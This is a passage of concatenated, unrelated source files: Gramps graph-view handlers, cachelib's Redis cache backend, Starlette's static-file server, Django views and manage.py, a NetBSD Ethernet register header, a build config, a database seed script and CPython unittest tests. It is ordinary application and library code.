progressdlg.GtkProgressDialog,
("", self.uistate.window, Gtk.DialogFlags.MODAL),
popup_time=2)
status = progressdlg.LongOpStatus(msg=_("Adding Tags"),
total_steps=1,
interval=1 // 20)
pmon.add_op(status)
target.set_tag_list([item[0] for item in tag_list])
if otype == 'person':
msg = _('Adding Tags to person (%s)') % handle
with DbTxn(msg, self.dbstate.db) as trans:
self.dbstate.db.commit_person(target, trans)
status.heartbeat()
else:
msg = _('Adding Tags to family (%s)') % handle
with DbTxn(msg, self.dbstate.db) as trans:
self.dbstate.db.commit_family(target, trans)
status.heartbeat()
status.end()
except WindowActiveError:
pass
def organize_tags(self, obj):
"""
Display the Organize Tags dialog.
see: .gramps.gui.view.tags
"""
handle, otype = obj.get_data()
if otype == 'person':
target = self.dbstate.db.get_person_from_handle(handle)
self.emit('focus-person-changed', (handle, ))
elif otype == 'family':
target = self.dbstate.db.get_family_from_handle(handle)
f_handle = target.get_father_handle()
if f_handle:
self.emit('focus-person-changed', (f_handle, ))
else:
m_handle = target.get_mother_handle()
if m_handle:
self.emit('focus-person-changed', (m_handle, ))
OrganizeTagsDialog(self.dbstate.db, self.uistate, [])
self.emit('rebuild-graph')
def add_parents_to_person(self, obj):
"""
Open dialog to add parents to person.
"""
person_handle = obj.get_data()
family = Family()
childref = ChildRef()
childref.set_reference_handle(person_handle)
family.add_child_ref(childref)
try:
EditFamily(self.dbstate, self.uistate, [], family)
except WindowActiveError:
return
# set edited person to scroll on it after rebuilding graph
self.emit('focus-person-changed', (person_handle, ))
def add_child_to_family(self, obj):
"""
Open person editor to create and add child to family.
"""
family_handle = obj.get_data()
callback = lambda x: self.__callback_add_child(x, family_handle)
person = Person()
name = Name()
# the editor requires a surname
name.add_surname(Surname())
name.set_primary_surname(0)
family = self.dbstate.db.get_family_from_handle(family_handle)
# try to get father
father_handle = family.get_father_handle()
if father_handle:
father = self.dbstate.db.get_person_from_handle(father_handle)
if father:
preset_name(father, name)
person.set_primary_name(name)
try:
EditPerson(self.dbstate, self.uistate, [], person,
callback=callback)
except WindowActiveError:
pass
def __callback_add_child(self, person, family_handle):
"""
Write data to db.
Callback from self.add_child_to_family().
"""
ref = ChildRef()
ref.ref = person.get_handle()
family = self.dbstate.db.get_family_from_handle(family_handle)
family.add_child_ref(ref)
with DbTxn(_("Add Child to Family"), self.dbstate.db) as trans:
# add parentref to child
person.add_parent_family_handle(family_handle)
# default relationship is used
self.dbstate.db.commit_person(person, trans)
# add child to family
self.dbstate.db.commit_family(family, trans)
def remove_person(self, obj):
"""
Remove a person from the database.
see: libpersonview.py
"""
person = obj.get_data()
msg1 = _('Delete %s?') % displayer.display(person)
msg2 = (_('Deleting the person [%s] will remove it '
'from the database.') % person.gramps_id)
dialog = QuestionDialog2(msg1, msg2,
_("Yes"), _("No"),
self.uistate.window)
if dialog.run():
# set the busy cursor, so the user knows that we are working
self.uistate.set_busy_cursor(True)
# create the transaction
with DbTxn('', self.dbstate.db) as trans:
# create description to save
description = (_("Delete Person (%s)")
% displayer.display(person))
# delete the person from the database
# Above will emit person-delete signal
self.dbstate.db.delete_person_from_database(person, trans)
trans.set_description(description)
self.uistate.set_busy_cursor(False)
def remove_family(self, obj):
"""
Remove a family from the database.
see: familyview.py
"""
family = obj.get_data()
msg1 = _('Delete family [%s]?') % family.gramps_id
msg2 = _('Deleting the family will remove it from the database.')
dialog = QuestionDialog2(msg1, msg2,
_("Yes"), _("No"),
self.uistate.window)
if dialog.run():
# set the busy cursor, so the user knows that we are working
self.uistate.set_busy_cursor(True)
# create the transaction
with DbTxn('', self.dbstate.db) as trans:
# create description to save
description = _("Delete Family [%s]") % family.gramps_id
# delete the family from the database
self.dbstate.db.remove_family_relationships(family.handle,
trans)
trans.set_description(description)
self.uistate.set_busy_cursor(False)
def add_to_bookmarks(self, obj):
"""
Adds bookmark for person.
See: navigationview.py and bookmarks.py
"""
handle, person = obj.get_data()
self.bookmarks.add(handle)
name = displayer.display(person)
self.uistate.push_message(self.dbstate,
_("%s has been bookmarked") % name)
def remove_from_bookmarks(self, obj):
"""
Remove person from the list of bookmarked people.
See: bookmarks.py
"""
handle = obj.get_data()
self.bookmarks.remove_handles([handle])
|
import pickle
import typing as _t
from cachelib.base import BaseCache
class RedisCache(BaseCache):
"""Uses the Redis key-value store as a cache backend.
The first argument can be either a string denoting address of the Redis
server or an object resembling an instance of a redis.Redis class.
Note: Python Redis API already takes care of encoding unicode strings on
the fly.
:param host: address of the Redis server or an object which API is
compatible with the official Python Redis client (redis-py).
:param port: port number on which Redis server listens for connections.
:param password: password authentication for the Redis server.
:param db: db (zero-based numeric index) on Redis Server to connect.
:param default_timeout: the default timeout that is used if no timeout is
specified on :meth:`~BaseCache.set`. A timeout of
0 indicates that the cache never expires.
:param key_prefix: A prefix that should be added to all keys.
Any additional keyword arguments will be passed to ``redis.Redis``.
"""
def __init__(
self,
host: str = "localhost",
port: int = 6379,
password: _t.Optional[str] = None,
db: int = 0,
default_timeout: int = 300,
key_prefix: _t.Optional[str] = None,
**kwargs: _t.Any
):
BaseCache.__init__(self, default_timeout)
if host is None:
raise ValueError("RedisCache host parameter may not be None")
if isinstance(host, str):
try:
import redis
except ImportError:
raise RuntimeError("no redis module found")
if kwargs.get("decode_responses", None):
raise ValueError("decode_responses is not supported by RedisCache.")
self._client = redis.Redis(
host=host, port=port, password=password, db=db, **kwargs
)
self.key_prefix = key_prefix or ""
def _normalize_timeout(self, timeout: _t.Optional[int]) -> int:
timeout = BaseCache._normalize_timeout(self, timeout)
if timeout == 0:
timeout = -1
return timeout
def dump_object(self, value: _t.Any) -> bytes:
"""Dumps an object into a string for redis. By default it serializes
integers as regular string and pickle dumps everything else.
"""
if type(value) == int:
return str(value).encode("ascii")
return b"!" + pickle.dumps(value)
def load_object(self, value: _t.Optional[bytes]) -> _t.Any:
"""The reversal of :meth:`dump_object`. This might be called with
None.
"""
if value is None:
return None
if value.startswith(b"!"):
try:
return pickle.loads(value[1:])
except pickle.PickleError:
return None
try:
return int(value)
except ValueError:
# before 0.8 we did not have serialization. Still support that.
return value
def get(self, key: str) -> _t.Any:
return self.load_object(self._client.get(self.key_prefix + key))
def get_many(self, *keys: str) -> _t.List[_t.Any]:
if self.key_prefix:
prefixed_keys = [self.key_prefix + key for key in keys]
else:
prefixed_keys = [k for k in keys]
return [self.load_object(x) for x in self._client.mget(prefixed_keys)]
def set(
self, key: str, value: _t.Any, timeout: _t.Optional[int] = None
) -> _t.Optional[bool]:
timeout = self._normalize_timeout(timeout)
dump = self.dump_object(value)
if timeout == -1:
result = self._client.set(name=self.key_prefix + key, value=dump)
else:
result = self._client.setex(
name=self.key_prefix + key, value=dump, time=timeout
)
return result
def add(self, key: str, value: _t.Any, timeout: _t.Optional[int] = None) -> bool:
timeout = self._normalize_timeout(timeout)
dump = self.dump_object(value)
return self._client.setnx(
name=self.key_prefix + key, value=dump
) and self._client.expire(name=self.key_prefix + key, time=timeout)
def set_many(
self, mapping: _t.Dict[str, _t.Any], timeout: _t.Optional[int] = None
) -> _t.List[_t.Any]:
timeout = self._normalize_timeout(timeout)
# Use transaction=False to batch without calling redis MULTI
# which is not supported by twemproxy
pipe = self._client.pipeline(transaction=False)
for key, value in mapping.items():
dump = self.dump_object(value)
if timeout == -1:
pipe.set(name=self.key_prefix + key, value=dump)
else:
pipe.setex(name=self.key_prefix + key, value=dump, time=timeout)
return pipe.execute()
def delete(self, key: str) -> int:
return self._client.delete(self.key_prefix + key)
def delete_many(self, *keys: str) -> _t.Optional[int]:
if not keys:
return None
if self.key_prefix:
prefixed_keys = [self.key_prefix + key for key in keys]
else:
prefixed_keys = [k for k in keys]
return self._client.delete(*prefixed_keys)
def has(self, key: str) -> int:
return self._client.exists(self.key_prefix + key)
def clear(self) -> int:
status = 0
if self.key_prefix:
keys = self._client.keys(self.key_prefix + "*")
if keys:
status = self._client.delete(*keys)
else:
status = self._client.flushdb()
return status
def inc(self, key: str, delta: int = 1) -> int:
return self._client.incr(name=self.key_prefix + key, amount=delta)
def dec(self, key: str, delta: int = 1) -> int:
return self._client.incr(name=self.key_prefix + key, amount=-delta)
|
#!/usr/bin/.env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ExpenseTracker.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
#ifndef TESTCOMPUTECOMMONATTRIBUTES_H
#define TESTCOMPUTECOMMONATTRIBUTES_H
#include "../src/ShapePopulationBase.h"
#include <math.h>
class TestShapePopulationBase
{
public:
TestShapePopulationBase();
bool testComputeCommonAttributes(std::string filename, std::string filenameExpectedResult);
};
#endif // TESTCOMPUTECOMMONATTRIBUTES_H
|
const db = require("../db/conn");
const { Post, Community, User } = require("../models");
const postData = require("./postData.json");
const userData = require("./userData.json");
const communityData = require("./communityData.json");
db.once("open", async () => {
await Post.deleteMany({});
const post = await Post.insertMany(postData);
console.log("Posts seeded!");
await User.deleteMany({});
const user = await User.insertMany(userData);
console.log("Users seeded!");
await Community.deleteMany({});
const community = await Community.insertMany(communityData);
console.log("Communities seeded!");
process.exit(0);
});
|
import importlib.util
import os
import stat
import typing
from email.utils import parsedate
import anyio
from starlette.datastructures import URL, Headers
from starlette.exceptions import HTTPException
from starlette.responses import FileResponse, RedirectResponse, Response
from starlette.types import Receive, Scope, Send
PathLike = typing.Union[str, "os.PathLike[str]"]
class NotModifiedResponse(Response):
NOT_MODIFIED_HEADERS = (
"cache-control",
"content-location",
"date",
"etag",
"expires",
"vary",
)
def __init__(self, headers: Headers):
super().__init__(
status_code=304,
headers={
name: value
for name, value in headers.items()
if name in self.NOT_MODIFIED_HEADERS
},
)
class StaticFiles:
def __init__(
self,
*,
directory: PathLike = None,
packages: typing.List[typing.Union[str, typing.Tuple[str, str]]] = None,
html: bool = False,
check_dir: bool = True,
) -> None:
self.directory = directory
self.packages = packages
self.all_directories = self.get_directories(directory, packages)
self.html = html
self.config_checked = False
if check_dir and directory is not None and not os.path.isdir(directory):
raise RuntimeError(f"Directory '{directory}' does not exist")
def get_directories(
self,
directory: PathLike = None,
packages: typing.List[typing.Union[str, typing.Tuple[str, str]]] = None,
) -> typing.List[PathLike]:
"""
Given `directory` and `packages` arguments, return a list of all the
directories that should be used for serving static files from.
"""
directories = []
if directory is not None:
directories.append(directory)
for package in packages or []:
if isinstance(package, tuple):
package, statics_dir = package
else:
statics_dir = "statics"
spec = importlib.util.find_spec(package)
assert spec is not None, f"Package {package!r} could not be found."
assert spec.origin is not None, f"Package {package!r} could not be found."
package_directory = os.path.normpath(
os.path.join(spec.origin, "..", statics_dir)
)
assert os.path.isdir(
package_directory
), f"Directory '{statics_dir!r}' in package {package!r} could not be found."
directories.append(package_directory)
return directories
async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:
"""
The ASGI entry point.
"""
assert scope["type"] == "http"
if not self.config_checked:
await self.check_config()
self.config_checked = True
path = self.get_path(scope)
response = await self.get_response(path, scope)
await response(scope, receive, send)
def get_path(self, scope: Scope) -> str:
"""
Given the ASGI scope, return the `path` string to serve up,
with OS specific path separators, and any '..', '.' components removed.
"""
return os.path.normpath(os.path.join(*scope["path"].split("/")))
async def get_response(self, path: str, scope: Scope) -> Response:
"""
Returns an HTTP response, given the incoming path, method and request headers.
"""
if scope["method"] not in ("GET", "HEAD"):
raise HTTPException(status_code=405)
try:
full_path, stat_result = await anyio.to_thread.run_sync(
self.lookup_path, path
)
except PermissionError:
raise HTTPException(status_code=401)
except OSError:
raise
if stat_result and stat.S_ISREG(stat_result.st_mode):
# We have a static file to serve.
return self.file_response(full_path, stat_result, scope)
elif stat_result and stat.S_ISDIR(stat_result.st_mode) and self.html:
# We're in HTML mode, and have got a directory URL.
# Check if we have 'index.html' file to serve.
index_path = os.path.join(path, "index.html")
full_path, stat_result = await anyio.to_thread.run_sync(
self.lookup_path, index_path
)
if stat_result is not None and stat.S_ISREG(stat_result.st_mode):
if not scope["path"].endswith("/"):
# Directory URLs should redirect to always end in "/".
url = URL(scope=scope)
url = url.replace(path=url.path + "/")
return RedirectResponse(url=url)
return self.file_response(full_path, stat_result, scope)
if self.html:
# Check for '404.html' if we're in HTML mode.
full_path, stat_result = await anyio.to_thread.run_sync(
self.lookup_path, "404.html"
)
if stat_result and stat.S_ISREG(stat_result.st_mode):
return FileResponse(
full_path,
stat_result=stat_result,
method=scope["method"],
status_code=404,
)
raise HTTPException(status_code=404)
def lookup_path(
self, path: str
) -> typing.Tuple[str, typing.Optional[os.stat_result]]:
for directory in self.all_directories:
full_path = os.path.realpath(os.path.join(directory, path))
directory = os.path.realpath(directory)
if os.path.commonprefix([full_path, directory]) != directory:
# Don't allow misbehaving clients to break out of the static files
# directory.
continue
try:
return full_path, os.stat(full_path)
except (FileNotFoundError, NotADirectoryError):
continue
return "", None
def file_response(
self,
full_path: PathLike,
stat_result: os.stat_result,
scope: Scope,
status_code: int = 200,
) -> Response:
method = scope["method"]
request_headers = Headers(scope=scope)
response = FileResponse(
full_path, status_code=status_code, stat_result=stat_result, method=method
)
if self.is_not_modified(response.headers, request_headers):
return NotModifiedResponse(response.headers)
return response
async def check_config(self) -> None:
"""
Perform a one-off configuration check that StaticFiles is actually
pointed at a directory, so that we can raise loud errors rather than
just returning 404 responses.
"""
if self.directory is None:
return
try:
stat_result = await anyio.to_thread.run_sync(os.stat, self.directory)
except FileNotFoundError:
raise RuntimeError(
f"StaticFiles directory '{self.directory}' does not exist."
)
if not (stat.S_ISDIR(stat_result.st_mode) or stat.S_ISLNK(stat_result.st_mode)):
raise RuntimeError(
f"StaticFiles path '{self.directory}' is not a directory."
)
def is_not_modified(
self, response_headers: Headers, request_headers: Headers
) -> bool:
"""
Given the request and response headers, return `True` if an HTTP
"Not Modified" response could be returned instead.
"""
try:
if_none_match = request_headers["if-none-match"]
etag = response_headers["etag"]
if if_none_match == etag:
return True
except KeyError:
pass
try:
if_modified_since = parsedate(request_headers["if-modified-since"])
last_modified = parsedate(response_headers["last-modified"])
if (
if_modified_since is not None
and last_modified is not None
and if_modified_since >= last_modified
):
return True
except KeyError:
pass
return False
|
import typescript from "rollup-plugin-typescript2"
import {nodeResolve} from "@rollup/plugin-node-resolve"
import commonJS from "@rollup/plugin-commonjs"
export default {
input: "./src/index.ts",
output: [{
format: "cjs",
file: "./dist/index.cjs",
externalLiveBindings: false
}, {
format: "es",
file: "./dist/index.js",
externalLiveBindings: false
}],
plugins: [
nodeResolve(),
commonJS(),
typescript({
check: false,
tsconfigOverride: {
compilerOptions: {
lib: ["es5", "es6"],
target: "es6",
strict: false,
declaration: true
}
},
include: ["src/*.ts"]
})
]
}
|
# -*- coding: utf-8 -*-
#import sys
#import os
#import sample
#def initialize():
# sys.path.insert(0, "C:\\Users\\usuario\\GIT\\Game\\sample")
# sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import sample
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, redirect, render
from .forms import RecpieForm
from .models import Ingredient, Recipe, RecipeIngredient
@login_required
def food_recipe_list_view(request):
""" View: Get all recipies associated with the current user. """
qs = Recipe.objects.filter(user=request.user)
context = {
"recipes": qs,
}
return render(request, "food/recipe_list.html", context)
# @login_required
# def food_recipe_detail_view(request, id=None):
# """ View: Get the recipe details of a specific recipie. """
# obj = get_object_or_404(Recipe, id=id, user=request.user)
# context = {
# "recipe": obj
# }
# return render(request, "food/recipe_list.html", context)
@login_required
def food_recipe_create_view(request, id=None):
""" View: Create a new recipe associated with the current user. """
form = RecpieForm(request.POST or None)
context = {
"form": form
}
if form.is_valid():
obj = form.save(commit=False)
obj.user = request.user
obj.save()
return redirect(obj.get_absolute_url())
return render(request, "food/recipe_create.html", context)
@login_required
def food_recipe_edit_view(request, id=None):
""" View: Update an existing recipe associated with the current user. """
obj = get_object_or_404(Recipe, id=id, user=request.user)
form = RecpieForm(request.POST or None, instance=obj)
context = {
"form": form,
"object": obj
}
if form.is_valid():
form.save()
context['message'] = 'Data saved'
return redirect('/food/recipes/')
#return redirect(obj.get_absolute_url())
return render(request, "food/recipe_edit.html", context)
|
/* $NetBSD: fmvreg.h,v 1.1 2002/10/05 15:16:11 tsutsui Exp $ */
/*
* All Rights Reserved, Copyright (C) Fujitsu Limited 1995
*
* This software may be used, modified, copied, distributed, and sold,
* in both source and binary form provided that the above copyright,
* these terms and the following disclaimer are retained. The name of
* the author and/or the contributor may not be used to endorse or
* promote products derived from this software without specific prior
* written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND THE CONTRIBUTOR ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR THE CONTRIBUTOR BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/*
* Hardware specification of various 86960/86965 based Ethernet cards.
* Contributed by M.S. <seki@sysrap.cs.fujitsu.co.jp>
*/
/*
* Registers on FMV-180 series' ISA bus interface ASIC.
* I'm not sure the following register names are appropriate.
* Doesn't it look silly, eh? FIXME.
*/
#define FE_FMV0 16 /* Hardware status. */
#define FE_FMV1 17 /* Hardrare type? Always 0 */
#define FE_FMV2 18 /* Hardware configuration. */
#define FE_FMV3 19 /* Hardware enable. */
#define FE_FMV4 20 /* Station address #1 */
#define FE_FMV5 21 /* Station address #2 */
#define FE_FMV6 22 /* Station address #3 */
#define FE_FMV7 23 /* Station address #4 */
#define FE_FMV8 24 /* Station address #5 */
#define FE_FMV9 25 /* Station address #6 */
#define FE_FMV10 26 /* Unknown; to be set to 0. */
/*
* FMV-180 series' ASIC register values.
*/
/* Magic value in FMV0 register. */
#define FE_FMV0_MAGIC_MASK 0x78
#define FE_FMV0_MAGIC_VALUE 0x50
/* Model identification. */
#define FE_FMV0_MODEL 0x07
#define FE_FMV0_MODEL_FMV181 0x05 /* FMV-181/181A */
#define FE_FMV0_MODEL_FMV182 0x03 /* FMV-182/182A/184 */
#define FE_FMV0_MODEL_FMV183 0x04 /* FMV-183 */
/* Card type ID */
#define FE_FMV1_MAGIC_MASK 0xB0
#define FE_FMV1_MAGIC_VALUE 0x00
#define FE_FMV1_CARDID_REV 0x0F
#define FE_FMV1_CARDID_REV_A 0x01 /* FMV-181A/182A */
#define FE_FMV1_CARDID_PNP 0x08 /* FMV-183/184 */
/* I/O port address assignment. */
#define FE_FMV2_ADDR 0x07
#define FE_FMV2_ADDR_SHIFT 0
/* Boot ROM address assignment. */
#define FE_FMV2_ROM 0x38
#define FE_FMV2_ROM_SHIFT 3
/* IRQ assignment. */
#define FE_FMV2_IRQ 0xC0
#define FE_FMV2_IRQ_SHIFT 6
/* Hardware(?) enable flag. */
#define FE_FMV3_ENABLE_FLAG 0x80
/* Extra bits in FMV3 register. Always 0? */
#define FE_FMV3_EXTRA_MASK 0x7F
#define FE_FMV3_EXTRA_VALUE 0x00
|
import io
import sys
import textwrap
from test.support import warnings_helper, captured_stdout, captured_stderr
import traceback
import unittest
from unittest.util import strclass
class MockTraceback(object):
class TracebackException:
def __init__(self, *args, **kwargs):
self.capture_locals = kwargs.get('capture_locals', False)
def format(self):
result = ['A traceback']
if self.capture_locals:
result.append('locals')
return result
def restore_traceback():
unittest.result.traceback = traceback
def bad_cleanup1():
print('do cleanup1')
raise TypeError('bad cleanup1')
def bad_cleanup2():
print('do cleanup2')
raise ValueError('bad cleanup2')
class BufferedWriter:
def __init__(self):
self.result = ''
self.buffer = ''
def write(self, arg):
self.buffer += arg
def flush(self):
self.result += self.buffer
self.buffer = ''
def getvalue(self):
return self.result
class Test_TestResult(unittest.TestCase):
# Note: there are not separate tests for TestResult.wasSuccessful(),
# TestResult.errors, TestResult.failures, TestResult.testsRun or
# TestResult.shouldStop because these only have meaning in terms of
# other TestResult methods.
#
# Accordingly, tests for the aforenamed attributes are incorporated
# in with the tests for the defining methods.
################################################################
def test_init(self):
result = unittest.TestResult()
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 0)
self.assertEqual(result.shouldStop, False)
self.assertIsNone(result._stdout_buffer)
self.assertIsNone(result._stderr_buffer)
# "This method can be called to signal that the set of tests being
# run should be aborted by setting the TestResult's shouldStop
# attribute to True."
def test_stop(self):
result = unittest.TestResult()
result.stop()
self.assertEqual(result.shouldStop, True)
# "Called when the test case test is about to be run. The default
# implementation simply increments the instance's testsRun counter."
def test_startTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# "Called after the test case test has been executed, regardless of
# the outcome. The default implementation does nothing."
def test_stopTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# Same tests as above; make sure nothing has changed
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "Called before and after tests are run. The default implementation does nothing."
def test_startTestRun_stopTestRun(self):
result = unittest.TestResult()
result.startTestRun()
result.stopTestRun()
# "addSuccess(test)"
# ...
# "Called when the test case test succeeds"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addSuccess(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "addFailure(test, err)"
# ...
# "Called when the test case test signals a failure. err is a tuple of
# the form returned by sys.exc_info(): (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addFailure(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
test.fail("foo")
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addFailure(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
# "addError(test, err)"
# ...
# "Called when the test case test raises an unexpected exception err
# is a tuple of the form returned by sys.exc_info():
# (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addError(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
raise TypeError()
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addError(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
def test_addError_locals(self):
class Foo(unittest.TestCase):
def test_1(self):
1/0
test = Foo('test_1')
result = unittest.TestResult()
result.tb_locals = True
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
result.startTestRun()
test.run(result)
result.stopTestRun()
self.assertEqual(len(result.errors), 1)
test_case, formatted_exc = result.errors[0]
self.assertEqual('A tracebacklocals', formatted_exc)
def test_addSubTest(self):
class Foo(unittest.TestCase):
def test_1(self):
nonlocal subtest
with self.subTest(foo=1):
subtest = self._subtest
try:
1/0
except ZeroDivisionError:
exc_info_tuple = sys.exc_info()
# Register an error by hand (to check the API)
result.addSubTest(test, subtest, exc_info_tuple)
# Now trigger a failure
self.fail("some recognizable failure")
subtest = None
test = Foo('test_1')
result = unittest.TestResult()
test.run(result)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, subtest)
self.assertIn("ZeroDivisionError", formatted_exc)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, subtest)
self.assertIn("some recognizable failure", formatted_exc)
def testGetDescriptionWithoutDocstring(self):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
'testGetDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult)')
def testGetSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1, bar=2):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) (foo=1, bar=2)')
with self.subTest('some message'):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) [some message]')
def testGetSubTestDescriptionWithoutDocstringAndParams(self):
with self.subTest():
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstringAndParams '
'(' + __name__ + '.Test_TestResult) (<subtest>)')
def testGetSubTestDescriptionForFalsyValues(self):
expected = 'testGetSubTestDescriptionForFalsyValues (%s.Test_TestResult) [%s]'
result = unittest.TextTestResult(None, True, 1)
for arg in [0, None, []]:
with self.subTest(arg):
self.assertEqual(
result.getDescription(self._subtest),
expected % (__name__, arg)
)
def testGetNestedSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1):
with self.subTest(baz=2, bar=3):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetNestedSubTestDescriptionWithoutDocstring '
'(' + __name__ + '.Test_TestResult) (baz=2, bar=3, foo=1)')
def testGetDuplicatedNestedSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1, bar=2):
with self.subTest(baz=3, bar=4):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetDuplicatedNestedSubTestDescriptionWithoutDocstring '
'(' + __name__ + '.Test_TestResult) (baz=3, bar=4, foo=1)')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithOneLineDocstring(self):
